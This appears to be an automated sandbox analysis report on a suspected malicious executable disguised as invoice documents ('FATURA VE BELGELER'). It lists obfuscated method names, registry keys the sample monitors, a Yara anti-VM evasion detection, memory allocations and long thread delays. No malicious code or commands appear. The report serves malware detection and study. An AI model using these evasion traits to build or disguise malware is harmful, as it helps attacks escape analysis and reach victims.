Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, pnilJbS9iaxlHxnHSk.cs	High entropy of concatenated method names: 'AChjVoqn4', 'ghoriI7De', 'pWeUtWK6S', 'BLcI1iHwl', 'P5innUOIx', 'anvCU5DXl', 'dwoUdgT4yPSGYCLUX8', 'nyIBBCRJLC8FTFqarl', 'GOPS5PVrv', 'y3X9fuJPs'
Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, FIvlf4GCjOLwyghDjKM.cs	High entropy of concatenated method names: 'iODYqGl18J', 'yrcYdaxf0O', 'wcqYj1ZEY5', 'nFuYrp7ppq', 'sN3YWo3c48', 'HslYUTjl9k', 'LiTYIK9Jlg', 'FITYpZDxJ1', 'H09YnNkYGU', 'uhtYCKsO3l'
Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, bfByhCz8pWFqRTYI4g.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hDbYVPE76L', 'tGDYGQQ9Fd', 'WS3YkoF1cZ', 'xe0Y21cg0h', 'VIhYSBtcc7', 'vf7YYd899e', 'XSGY9HrkTt'
Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, xQA61fJ7NhNeg5aON1.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'cFQyL5AecR', 'XWFywAbT3S', 'KxoyzZv4oK', 'yh60giZU8q', 'zkS0eDYM7h', 'cFF0yd476f', 'OO400pQCI0', 'wDnKHCCoZQqWQRxxSxd'
Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, LSdbflccGPGDq3hcQ1.cs	High entropy of concatenated method names: 'E8a2xvma2v', 'X5w2wiLD2P', 'mpxSgokIYZ', 'BepSekx8SK', 'c2A25y71FC', 'CfO2sIl2D7', 'YLG27uAdVJ', 'tdc2BUUFg2', 'xmX2a46BSH', 'uUV2hUIRgH'
Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, NyZSOB4emBHrtDpvVc.cs	High entropy of concatenated method names: 'CZYGFwiwt6', 'mBMGsCLGL0', 'HFkGBTJeoR', 'ALQGam3yxa', 'nrRG1lllq2', 'mEpGQ92WdH', 'DgWG66mcTa', 'sYVGf4gXNT', 'OMsG4xkEWf', 'KcFGO41JW9'
Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, RcFJLiEkFyke2NNnM7.cs	High entropy of concatenated method names: 'Dispose', 'rU4eLPUENk', 'Y3by1iM7TJ', 'Nds33YHHnC', 'QXSewn4aHQ', 'rNXez0Mkih', 'ProcessDialogKey', 'OMJygO1IXu', 'TjYye1W20g', 'aktyyZlFv1'
Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, CSLTMP26Mw8dlwhdX5.cs	High entropy of concatenated method names: 'fKWArfwwac', 'aytAUrhRm5', 'iANApk2GKU', 'z7sAnIPgr1', 'ajgAGO4hu8', 'D8bAk1eoCS', 'fcIA2xf6YE', 'YAXAS0FYBd', 'QjkAY4yPJF', 'AY4A9XUsBX'
Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, OUtb2jIJCbA1FRbDy9.cs	High entropy of concatenated method names: 'ToString', 'MSMk5149hg', 'CIxk13rDHS', 'TbNkQtmBD7', 'TVEk6CnLYp', 'PRjkflrtg4', 'XJkk4UnlDw', 'KurkOaIdMU', 'l3pkHbQ7YG', 'JQxk8pCgUn'
Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, XtRbDC8sv0rhqYhjUZ.cs	High entropy of concatenated method names: 'I2iTKbWYsU', 'VlLTAnNDog', 'sKdTPvt4yS', 'CE6PwnOirv', 'qZSPzGDNED', 'YxdTgcCSUw', 'vEDTeMyxkx', 'dJcTya9W9t', 'v14T0oL94N', 'gOjTbO31mf'
Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, SdBFpEBHlyXFcTvND6.cs	High entropy of concatenated method names: 'MsCTqGkCLt', 'V8iTdtQoMP', 'Wu2TjqQgHw', 'POSTrkLVG2', 'WUsTWKlAnN', 'hQ5TUru0tM', 'wQpTItbv1J', 'KRBTpqGv6G', 'SwlTnsci9e', 'r4bTCIrsG6'
Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, zFqOfCW7G8bv0AyfDi.cs	High entropy of concatenated method names: 'uuR2RyqL1C', 'gOd2JB0iXv', 'ToString', 'bJU2KycpkI', 'PrF2inUmgO', 'ITP2AhbSSR', 'oFo2NgbQ4K', 'GQJ2PfCl8f', 'Hg62T5HVEf', 'btx2vxCahq'
Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, WSy7P55k0hTS6fLHwF.cs	High entropy of concatenated method names: 'cHJ0Emn0Tj', 'zHi0KqCsy4', 'x020iV0Qy2', 'G9i0A9ucDX', 'w1A0N500HA', 'SkO0PrC660', 'KWe0TGhteO', 'euZ0v9InP3', 'W400uKkqUj', 'zTZ0RVUF0u'
Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, h0MxUAiRwfmKieeEn0.cs	High entropy of concatenated method names: 'rbXYeScFsl', 'BwXY0wXHKO', 'PphYbFbpKd', 'mj1YKs23l0', 'UyVYiMqoXZ', 'y4GYNOd3rZ', 'UVcYPrAhef', 'kxlSZs0TIO', 'hGISxij7Ha', 'vhASLiX1Ru'
Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, Avwu49KGxRSsoLWJIf.cs	High entropy of concatenated method names: 'oGxSDDj3tY', 'GutS1UQ9U9', 'kVYSQyuLpk', 'KdoS64TsYN', 'PqSSBPoAmC', 'PRMSfUN19n', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, or5jHvqBByl8DNsQaI.cs	High entropy of concatenated method names: 'jyFSKXkump', 'nHOSi9Fs9w', 'RyrSAZpCdp', 'KeFSNUu12I', 'tesSPEboeu', 'KEBSTcAaqO', 'lUgSvLXPYL', 'XPcSuHCKNm', 'Ia5SRMpYnh', 'DWZSJBnSbQ'
Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, Ce32rVukiNFuNjRUcV.cs	High entropy of concatenated method names: 'aMPVpeYSdk', 'jMNVn7Un4a', 'Q7pVDJnhen', 'ir9V1xuUq0', 'e7XV6VpuM3', 'MbfVf8llUu', 'vmrVOFC32M', 'B7LVHmMFXJ', 'tVDVFcljG2', 'I1YV5rowci'
Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, OAllAqXVCQegZBCPul.cs	High entropy of concatenated method names: 'U2KeTW1mNc', 'prmevVgmfR', 'EFyeRXbyKW', 'nXheJsyDDQ', 'Tq2eG8CJL9', 'Ut4ek1S8DL', 'I1qZZYS9Qw5Nt27n0F', 'ljsHEKJikqxgXYBA2T', 'uyreekKB7N', 'F1we0wgo06'
Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, iBFtFdGoCHLmE14Lc82.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pIZ9BDP5qa', 'LMD9aOTx8i', 'WJe9hcJOLO', 'cdr9cuZkWP', 'WBZ9oQSd2C', 'JP59X87P5I', 'uxm9ZDXkTu'
Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, be03F9dtp0fyw81fnC.cs	High entropy of concatenated method names: 'XFUPEMeWcG', 'C7fPiaqDfb', 'ErLPNr6MqO', 'c9YPTagRoW', 'OJVPv3AQbR', 'qioNoMOhjS', 'JapNXmNq7s', 'h9PNZlTnpF', 'FArNxLTZAw', 'JKvNLHTDQp'
Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, BEm2Jp6mHTFCaiDYj3.cs	High entropy of concatenated method names: 'zExiBK0oIZ', 'wPSialf2qX', 'yHtihnE5QX', 'zNCiccnUOu', 'wFuioUdUMn', 'b7qiXCXVdk', 'ceRiZ66b95', 'G6UixtD69X', 'UL2iLU9A0f', 'lVpiwBfWtv'
Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, pnilJbS9iaxlHxnHSk.cs	High entropy of concatenated method names: 'AChjVoqn4', 'ghoriI7De', 'pWeUtWK6S', 'BLcI1iHwl', 'P5innUOIx', 'anvCU5DXl', 'dwoUdgT4yPSGYCLUX8', 'nyIBBCRJLC8FTFqarl', 'GOPS5PVrv', 'y3X9fuJPs'
Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, FIvlf4GCjOLwyghDjKM.cs	High entropy of concatenated method names: 'iODYqGl18J', 'yrcYdaxf0O', 'wcqYj1ZEY5', 'nFuYrp7ppq', 'sN3YWo3c48', 'HslYUTjl9k', 'LiTYIK9Jlg', 'FITYpZDxJ1', 'H09YnNkYGU', 'uhtYCKsO3l'
Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, bfByhCz8pWFqRTYI4g.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hDbYVPE76L', 'tGDYGQQ9Fd', 'WS3YkoF1cZ', 'xe0Y21cg0h', 'VIhYSBtcc7', 'vf7YYd899e', 'XSGY9HrkTt'
Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, xQA61fJ7NhNeg5aON1.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'cFQyL5AecR', 'XWFywAbT3S', 'KxoyzZv4oK', 'yh60giZU8q', 'zkS0eDYM7h', 'cFF0yd476f', 'OO400pQCI0', 'wDnKHCCoZQqWQRxxSxd'
Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, LSdbflccGPGDq3hcQ1.cs	High entropy of concatenated method names: 'E8a2xvma2v', 'X5w2wiLD2P', 'mpxSgokIYZ', 'BepSekx8SK', 'c2A25y71FC', 'CfO2sIl2D7', 'YLG27uAdVJ', 'tdc2BUUFg2', 'xmX2a46BSH', 'uUV2hUIRgH'
Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, NyZSOB4emBHrtDpvVc.cs	High entropy of concatenated method names: 'CZYGFwiwt6', 'mBMGsCLGL0', 'HFkGBTJeoR', 'ALQGam3yxa', 'nrRG1lllq2', 'mEpGQ92WdH', 'DgWG66mcTa', 'sYVGf4gXNT', 'OMsG4xkEWf', 'KcFGO41JW9'
Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, RcFJLiEkFyke2NNnM7.cs	High entropy of concatenated method names: 'Dispose', 'rU4eLPUENk', 'Y3by1iM7TJ', 'Nds33YHHnC', 'QXSewn4aHQ', 'rNXez0Mkih', 'ProcessDialogKey', 'OMJygO1IXu', 'TjYye1W20g', 'aktyyZlFv1'
Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, CSLTMP26Mw8dlwhdX5.cs	High entropy of concatenated method names: 'fKWArfwwac', 'aytAUrhRm5', 'iANApk2GKU', 'z7sAnIPgr1', 'ajgAGO4hu8', 'D8bAk1eoCS', 'fcIA2xf6YE', 'YAXAS0FYBd', 'QjkAY4yPJF', 'AY4A9XUsBX'
Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, OUtb2jIJCbA1FRbDy9.cs	High entropy of concatenated method names: 'ToString', 'MSMk5149hg', 'CIxk13rDHS', 'TbNkQtmBD7', 'TVEk6CnLYp', 'PRjkflrtg4', 'XJkk4UnlDw', 'KurkOaIdMU', 'l3pkHbQ7YG', 'JQxk8pCgUn'
Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, XtRbDC8sv0rhqYhjUZ.cs	High entropy of concatenated method names: 'I2iTKbWYsU', 'VlLTAnNDog', 'sKdTPvt4yS', 'CE6PwnOirv', 'qZSPzGDNED', 'YxdTgcCSUw', 'vEDTeMyxkx', 'dJcTya9W9t', 'v14T0oL94N', 'gOjTbO31mf'
Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, SdBFpEBHlyXFcTvND6.cs	High entropy of concatenated method names: 'MsCTqGkCLt', 'V8iTdtQoMP', 'Wu2TjqQgHw', 'POSTrkLVG2', 'WUsTWKlAnN', 'hQ5TUru0tM', 'wQpTItbv1J', 'KRBTpqGv6G', 'SwlTnsci9e', 'r4bTCIrsG6'
Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, zFqOfCW7G8bv0AyfDi.cs	High entropy of concatenated method names: 'uuR2RyqL1C', 'gOd2JB0iXv', 'ToString', 'bJU2KycpkI', 'PrF2inUmgO', 'ITP2AhbSSR', 'oFo2NgbQ4K', 'GQJ2PfCl8f', 'Hg62T5HVEf', 'btx2vxCahq'
Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, WSy7P55k0hTS6fLHwF.cs	High entropy of concatenated method names: 'cHJ0Emn0Tj', 'zHi0KqCsy4', 'x020iV0Qy2', 'G9i0A9ucDX', 'w1A0N500HA', 'SkO0PrC660', 'KWe0TGhteO', 'euZ0v9InP3', 'W400uKkqUj', 'zTZ0RVUF0u'
Source: 0.2.FATURA VE BELGELER..exe.5400000.10.raw.unpack, XG.cs	High entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
Source: 0.2.FATURA VE BELGELER..exe.2af6b84.3.raw.unpack, XG.cs	High entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: FATURA VE BELGELER..exe PID: 6464, type: MEMORYSTR

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Memory allocated: 28A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Memory allocated: 2AB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Memory allocated: 4AB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Memory allocated: 78E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Memory allocated: 6FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Memory allocated: 89E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Memory allocated: 99E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Memory allocated: 2810000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Memory allocated: 2A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Memory allocated: 2850000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 599452	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 598779	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 598540	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 598386	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 597053	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 596779	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 596670	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 596561	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 596452	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 596294	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 596182	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 596039	Jump to behavior
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Thread delayed: delay time: 595910	Jump to behavior
